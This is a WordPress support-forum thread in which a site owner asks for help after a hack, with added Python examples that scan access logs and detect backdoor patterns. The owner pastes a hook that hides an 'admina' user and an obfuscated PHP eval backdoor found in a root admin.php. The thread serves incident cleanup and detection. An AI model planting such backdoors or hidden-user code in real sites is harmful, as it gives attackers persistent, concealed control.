Hey,

    I just upgraded after my WP getting hacked.

    It was on a pretty new install already so there were only 2 other users and I removed them through phpMyAdmin. Now I'm getting this in the header on the main site:

    [code]add_action('pre_user_query', 'yoursite_pre_user_query');
    function yoursite_pre_user_query($user_search) {
        global $current_user;
        $username = $current_user->user_login;
        if ($username != 'admina') {
            global $wpdb;
            $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'admina'", $user_search->query_where);
        }
    }[/code]

    Anyone know what could be wrong please?

    Thanks for any help

Viewing 9 replies - 1 through 9 (of 9 total)
Moderator bcworkz

    (@bcworkz)

    There’s some code that’s missing <?php ?> tags, probably due to a failed if/else comparison related to the admina user. Code that works off a specific username is suspicious. Maybe your clean up was not as thorough as you thought?

    Thread Starter JohnDiver

    (@johndiver)

    Hey,

    My cleanup consisted of a fresh directory and fresh install of WordPress 4.7 and I entered the old database info in config.php, then went to wp-admin and simply upgraded the database. So there were no files from before the upgrade; the database was the only thing.

    Thanks

    Thread Starter JohnDiver

    (@johndiver)

    4.7 was also just downloaded from www.remarpro.com yesterday

    Moderator bcworkz

    (@bcworkz)

    What theme are you using? Did you install clean theme files? That code is an amateur attempt to hide the admina user from user queries. You may safely remove it, but I’m concerned about other malicious code that may be hiding in your theme somewhere that did not accidentally get exposed like this.

    Thread Starter JohnDiver

    (@johndiver)

    Hey,

    I totally forgot I moved over the theme the database was setup to use – Kasa Green – The code is from that – It also shows up in the admincp.

    When I changed back to one of the default themes the code is gone.

    Do you think this would be a problem with the theme or was it hacked another way while the site was online?

    Thanks again for your help

    Moderator bcworkz

    (@bcworkz)

    You’re probably fine, but an incursion IS possible. You might look through your access logs for suspicious POST requests with 200 status if the time span and amount of traffic isn’t too large. Unfortunately, without being able to see POST data, what’s suspicious and what’s normal can be difficult to discern. Strange user agents and IPs from well-known hacker countries (unless that’s where your server is located) would be suspicious. But suspicious != incursion.

    You’ll need to decide for yourself whether the risk is enough to warrant another clean-up just in case.
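A way to do the log review bcworkz describes, as an added example that is not part of this thread and not bcworkz's code: it parses combined-format access log lines, keeps only POST requests answered with 200, and attaches a reason for each one worth a closer look (a POST to a path WordPress does not normally accept POSTs on, a POST straight to a PHP file under wp-content, an empty or tool-like user agent, or a login POST that got a 200 instead of the 302 a successful login produces). The log lines, the path list and the user-agent markers are constructed for the example; tune them to your own site.

```python
"""Flag suspicious POST requests in an Apache/nginx combined-format access log.

Added example for this thread; the sample log lines, expected-path list and
user-agent markers are all constructed assumptions, not data from the site.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Paths a stock WordPress install legitimately receives POSTs on (assumption; extend for plugins).
EXPECTED_POST_PATHS = {"/wp-login.php", "/wp-admin/admin-ajax.php",
                       "/wp-comments-post.php", "/xmlrpc.php", "/wp-cron.php"}
# User-agent prefixes of scripting tools rather than browsers (assumption).
TOOL_UA_PREFIXES = ("python-requests", "curl/", "wget/", "go-http-client")

# Constructed sample log; the IPs are documentation ranges, the theme path is made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2016:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2016:10:01:09 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "https://example.com/wp-login.php" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2016:10:05:44 +0000] "POST /admin.php HTTP/1.1" 200 12 "-" "python-requests/2.12"
198.51.100.7 - - [10/Dec/2016:10:05:45 +0000] "POST /wp-content/themes/example-theme/header.php HTTP/1.1" 200 0 "-" "-"
192.0.2.9 - - [10/Dec/2016:10:07:00 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def reasons_for(entry):
    """List why a POST+200 entry deserves attention; empty list means nothing stood out."""
    reasons = []
    path = entry["path"].split("?", 1)[0]
    ua = entry["ua"].strip()
    if path not in EXPECTED_POST_PATHS:
        reasons.append("POST to a path WordPress does not normally receive POSTs on")
    if path.startswith("/wp-content/") and path.endswith(".php"):
        reasons.append("POST straight to a PHP file under wp-content (theme/plugin backdoor pattern)")
    if ua in ("", "-") or ua.lower().startswith(TOOL_UA_PREFIXES):
        reasons.append(f"unusual user agent {ua!r}")
    if path == "/wp-login.php":
        reasons.append("login POST answered 200 (form re-rendered; a successful login redirects with 302)")
    return reasons


def suspicious_posts(lines):
    """Return POST requests with status 200 that have at least one reason attached."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None or e["method"] != "POST" or e["status"] != "200":
            continue
        reasons = reasons_for(e)
        if reasons:
            hits.append({"ip": e["ip"], "time": e["time"], "path": e["path"],
                         "ua": e["ua"], "reasons": reasons})
    return hits


def posts_per_ip(lines):
    """Count POST requests per client IP, to spot a single source hammering the site."""
    return Counter(e["ip"] for e in map(parse_line, lines) if e and e["method"] == "POST")


if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["ip"], hit["path"], "|", "; ".join(hit["reasons"]))
    print(posts_per_ip(SAMPLE_LOG.splitlines()).most_common(3))
```

Run it against a real log with `suspicious_posts(open("access.log").readlines())`. The output is a shortlist for a human, not a verdict: as the post above says, suspicious is not the same as an incursion, and only the request bodies (which the access log does not hold) would settle it.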

    Thread Starter JohnDiver

    (@johndiver)

    At this stage it seems like I have to remove all my sites.

    It started with 1 or 2 WP sites but then it seems to have affected the server and other non-WP sites after a long time.

    Some of the WP installs were very out of date though, so it could easily have come through that.

    I wish I knew what it actually is though, because now files on other scripts are being affected and files with what is obviously some type of hack / virus are being created even when I created a new empty folder.

    For example this is code from one file from a WP that was hacked:

    [code]<?php $bxh1 ="obc4spdte6a_"; $emsb10 = strtolower ($bxh1[1].$bxh1[10].$bxh1[4].$bxh1[8]. $bxh1[9]. $bxh1[3] .$bxh1[11]. $bxh1[6].$bxh1[8].$bxh1[2]. $bxh1[0].$bxh1[6].$bxh1[8]) ;$dzn5= strtoupper($bxh1[11].$bxh1[5].$bxh1[0]. $bxh1[4].$bxh1[7] ) ;if(isset ( ${ $dzn5 }['n2a5248' ])) {eval( $emsb10 ( ${ $dzn5 } [ 'n2a5248' ]) ) ;}?>[/code]

    This is in a file called admin.php in the root dir of WP.
    There are numerous of these. These are shown as suspected files; none of the files in the theme folder are showing as suspected though.

    Thanks
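An added example, not code from this thread or from WordPress, that turns the two pieces of code posted above into static indicators a cleanup can grep for: the `pre_user_query` hook that filters a hard-coded `user_login` out of user queries (the snippet from the first post), and the `admin.php` pattern where characters of a seed string are indexed and concatenated into a function name that is applied to a superglobal reached through a variable variable and fed to `eval`. It also lists PHP files in the WordPress root that are not part of a stock install, which is how an `admin.php` there stands out. The sample files are constructed copies of those two shapes plus one clean theme file; the indicator regexes and the core-root file list are the example's own assumptions.

```python
"""Static indicators for the two kinds of code seen in this thread.

Added example; the sample sources are constructed (the dropper's seed string is a
placeholder that decodes to nothing), and the regexes are assumptions to tune.
"""
import re

# Ordered so the report lists the strongest indicator first.
INDICATORS = [
    # eval() whose argument reaches a request superglobal, directly or via ${ $var }.
    ("eval_of_request_input",
     re.compile(r'eval\s*\(.*?\$(?:_(?:POST|GET|REQUEST|COOKIE)\b|\{\s*\$\w+\s*\})', re.S)),
    # Three or more single characters of a string concatenated: a name being assembled.
    ("indexed_char_assembly",
     re.compile(r'(?:\$\w+\s*\[\s*\d+\s*\]\s*\.\s*){3,}')),
    # A variable used as a function name, called on an element of another variable.
    ("dynamic_function_call_on_input",
     re.compile(r'\$\w+\s*\(\s*\$\{?\s*\$?\w+\s*\}?\s*\[')),
    # The unobfuscated form of the same idea; name assembly is used precisely to dodge this.
    ("decoder_into_eval",
     re.compile(r'eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(')),
    # A pre_user_query hook that hides one literal user_login from admin user lists.
    ("hidden_user_filter",
     re.compile(r'pre_user_query.*?user_login\s*!=\s*[\'"]\w+[\'"]', re.S)),
]

# PHP files that ship in the root of a WordPress install (wp-config.php is created at setup).
CORE_ROOT_FILES = {
    "index.php", "wp-activate.php", "wp-blog-header.php", "wp-comments-post.php",
    "wp-config-sample.php", "wp-config.php", "wp-cron.php", "wp-links-opml.php",
    "wp-load.php", "wp-login.php", "wp-mail.php", "wp-settings.php", "wp-signup.php",
    "wp-trackback.php", "xmlrpc.php",
}

# Constructed sample tree: path -> file contents.
SAMPLES = {
    # Shape of the hidden-user hook pasted in the first post (constructed copy).
    "wp-content/themes/example-theme/functions.php": """<?php
add_action('pre_user_query', 'example_hide_user');
function example_hide_user($user_search) {
    global $current_user, $wpdb;
    if ($current_user->user_login != 'admina') {
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'admina'", $user_search->query_where);
    }
}
""",
    # Shape of the admin.php dropper: indexed characters build a function name,
    # a second name selects a superglobal via ${ }, and the result is eval'd.
    # The seed string is a placeholder and the code is never executed here.
    "admin.php": """<?php $s="xxxxxxxxxxxx"; $f=strtolower($s[1].$s[10].$s[4].$s[8]); $g=strtoupper($s[11].$s[5].$s[0]);
if(isset(${ $g }['k1'])){eval( $f ( ${ $g } ['k1'] ));}?>""",
    # Ordinary theme code with nothing to flag.
    "wp-content/themes/twentyseventeen/header.php": """<?php wp_head(); ?><body <?php body_class(); ?>>""",
}


def scan_source(text):
    """Names of the indicators that match one file's contents, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_tree(sources):
    """Map each path to its list of matched indicators."""
    return {path: scan_source(text) for path, text in sources.items()}


def unexpected_root_php(paths):
    """PHP files directly in the install root that a stock WordPress does not ship."""
    return sorted(p for p in paths if "/" not in p and p.endswith(".php") and p not in CORE_ROOT_FILES)


if __name__ == "__main__":
    for path, found in scan_tree(SAMPLES).items():
        print(f"{path}: {', '.join(found) or 'clean'}")
    print("unexpected root PHP files:", unexpected_root_php(SAMPLES))
```

To run it over a real install, build `sources` by walking the directory and reading each `.php` file, with paths relative to the install root. A file with no hits is not proven clean (obfuscation varies), but anything that matches `eval_of_request_input` or `hidden_user_filter` needs a human to read it, and every root-level PHP file outside the core list needs an explanation.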

    Moderator bcworkz

    (@bcworkz)

    I’m afraid so. My previous post was based on the assumption the rest of the server was clean and there was this one snippet standing in the way of a clean/not clean decision.

    Now it sounds like the entire server was never properly cleaned. Treating separate sites on the same server account as separate unrelated entities is a common mistake. People will religiously keep their production site updated, but ignore an old staging site in a different folder. An unpatched vulnerability in that old staging site can cause the otherwise secure production site to become compromised.

    Locating the penetration vector can be very difficult if not impossible to determine. To some extent it doesn’t help much knowing this. Once the account is compromised, all content on it is suspect. You still need to close off all security vulnerabilities regardless of which one was actually used. It’d be silly to plug the one hole they used and leave others open.

    You’ve probably seen FAQ My site was hacked, but since you’re essentially starting over with a clean up, it’ll be helpful to review the process again.

    I’m sorry for your troubles. Best of luck to you.

    Thread Starter JohnDiver

    (@johndiver)

    Great reply

    I will look at the link for the hacked page now.

    I really hope this resolves this. I have a lot of sites compromised now and my host won’t enable the sites until it’s resolved.

    Thanks again

The topic ‘Error / code showing after deleting user admina through phpmyadmin’ is closed to new replies.